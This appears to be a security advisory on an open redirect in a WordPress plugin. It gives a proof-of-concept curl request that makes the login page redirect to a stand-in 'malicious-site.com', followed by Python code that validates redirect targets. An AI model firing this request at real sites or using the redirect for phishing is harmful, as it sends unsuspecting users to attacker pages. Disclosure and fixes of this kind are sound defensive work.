Description

The plugin does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue.
curl -kvL https://www.example.com/wp-login.php \
  -e http://arbitrary-referer \
  -d "log=invalid_username&pwd=invalid_password&tb_login=1&tb_redirect_fail=https://malicious-site.com"

- https://www.example.com should be replaced with the affected WordPress site URL.
- The request triggers a 302 redirect to the URL specified in tb_redirect_fail.
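The validation the description says is missing, as an added example that is not the plugin's own code: the value of tb_redirect_fail is accepted only when it is a site-relative path or an http(s) URL on the site's own host, and anything else falls back to a fixed page. The function names, SITE_URL and the /wp-login.php fallback are assumptions made for illustration.

```python
from urllib.parse import parse_qs, urlsplit

SITE_URL = "https://www.example.com"    # placeholder site URL from the advisory
FALLBACK = SITE_URL + "/wp-login.php"   # assumed safe default target


def safe_redirect_target(candidate, site_url=SITE_URL, fallback=FALLBACK):
    """Return candidate only if it stays on site_url's host, else fallback."""
    cleaned = (candidate or "").strip()
    # Browsers read "\" as "/" and drop tabs/newlines, so reject both outright.
    if "\\" in cleaned or any(ord(c) < 0x20 or ord(c) == 0x7F for c in cleaned):
        return fallback
    try:
        parts = urlsplit(cleaned)
        host = (parts.hostname or "").lower()
        has_userinfo = parts.username is not None or parts.password is not None
    except ValueError:                  # e.g. malformed IPv6 literal
        return fallback
    if not parts.scheme and not parts.netloc:
        # A site-relative path is fine; "///host" style values are not.
        ok = cleaned.startswith("/") and not cleaned.startswith("//")
        return cleaned if ok else fallback
    if parts.scheme not in ("http", "https"):
        return fallback                 # javascript:, data:, scheme-less "//host"
    if has_userinfo:
        return fallback                 # site host used as userinfo before "@"
    if host != (urlsplit(site_url).hostname or "").lower():
        return fallback                 # different or look-alike host
    return cleaned


def login_fail_location(post_body, site_url=SITE_URL):
    """Location value a login-failure handler would send after validation."""
    fields = parse_qs(post_body, keep_blank_values=True)
    requested = fields.get("tb_redirect_fail", [""])[0]
    return safe_redirect_target(requested, site_url, site_url + "/wp-login.php")
```

In WordPress plugin code, wp_validate_redirect() and wp_safe_redirect() provide this kind of host check.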